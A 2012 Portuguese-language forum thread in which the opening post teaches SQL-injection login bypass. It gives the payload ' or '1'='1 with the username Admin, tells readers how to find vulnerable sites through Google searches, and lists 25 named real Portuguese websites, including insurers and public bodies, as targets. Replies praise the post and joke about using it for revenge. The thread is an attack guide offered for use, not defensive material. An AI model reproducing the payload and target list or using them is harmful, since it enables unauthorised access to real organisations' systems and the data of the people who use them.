limão_PT 51 Posted August 10, 2012 Como invadir site por strings. Para mim este é o método mais facil. Vou comecar então a explicar! Passo 1: Encontrar sites vulneráveis a injeção por strings!, Como encontrar? fácil, basta ir ao google, e digitar strings, vou deixar exemplos no fundo do tópico. Passo 2: Entrar na página de login do site. Passo 3: Agora veremos se é mesmo vulnerável a strings, para isso digite: Username ou email: Admin ; Password:(meta strings) exemplo: ' or '1'='1 Passo 4: Pronto, se o site for vulnerável você já estará logado como admin! Links para download: Strings: http://www.mediafire.com/?xgtu3zztcgd35qc Eu não uso este método porque geralmente você não consegue fazer quase nada no site, mas vale a pena tentar! Aproveito para deixar aqui 25 sites vulneráveis que encontrei: 25 Sites vulneráveis a Strings Atenção meu objetivo é mostrar a falta de segurança informática em Portugal. Username:Admin Password:' or '1'='1 Sites vulneráveis 1-http://www.gncseguros.com/admin.aspx 2-http://www.prof2000.pt/trends/cgi-bin/adminpag/admin.asp 3-http://www.fmportugal.pt/login.asp?goto=defperfil.asp 4-http://www.jf-lapa.pt/site/login.asp?fromurl= 5-http://www.aaavanca.com/login.asp 6-http://www.performance.pt/login.asp 7-http://www.lowcostparking.pt/site/login.asp 8-http://www.intelikom.com/usa/authentication/login.asp 9-http://www.goucam.com/goucam/Login.asp 10-http://norleiloes.com/login.asp 11-http://www.scmcm.pt/membros/login.asp 12-http://www.enterrodagata.com/login.asp 13-http://minderico.com/escritacriativa/login.asp?goto=defperfil.asp 14-http://aemba.testmonday.com/bdcva/login.asp 15-http://www.videq.pt/site/login.asp 16-http://www.piacaodoninhou.com/login.asp?goto=defperfil.asp 17-http://www.meditrom.pt/login.asp 18-http://transportesdovalado.com/login.asp?action=login 19-https://online.zurichseguros.pt/login.asp 20-http://www.telecao.com/login.asp 21-http://www.piranhacd.com/login.asp?op=login 22-http://www.rppiscinas.com/login/login.asp 23-http://www.dgadr.pt/sementes/backoffice/global_group_login.asp 24-http://www.safeland.pt/login.asp 25-http://www.musicanapalmadamao.pt/login.asp Se te ajudei dá ai http://cyber-gamers.org/public/style_emoticons/default/451960.gif O meu conhecimento não é crime. O seu ato pode ser. 2 RulleZ and André Rochato reacted to this Share this post Link to post Share on other sites
André Rochato 253 Posted August 10, 2012 obrigado pelo topico! É sempre bom ter + uma partilha!http://cyber-gamers.org/public/style_emoticons/default/451960.gif Share this post Link to post Share on other sites
RulleZ 311 Posted August 10, 2012 Bom tópico http://cyber-gamers.org/public/style_emoticons/default/451960.gif ;) Share this post Link to post Share on other sites
Strimblaster 273 Posted August 10, 2012 Ohoh kd me quiser vingar de alguem... ehheehee http://cyber-gamers.org/public/style_emoticons/default/451960.gif Share this post Link to post Share on other sites
Ŧá๒i๏ รilvค™ 491 Posted August 10, 2012 Ohoh kd me quiser vingar de alguem... ehheehee http://cyber-gamers.org/public/style_emoticons/default/451960.gifaahah mesmo Share this post Link to post Share on other sites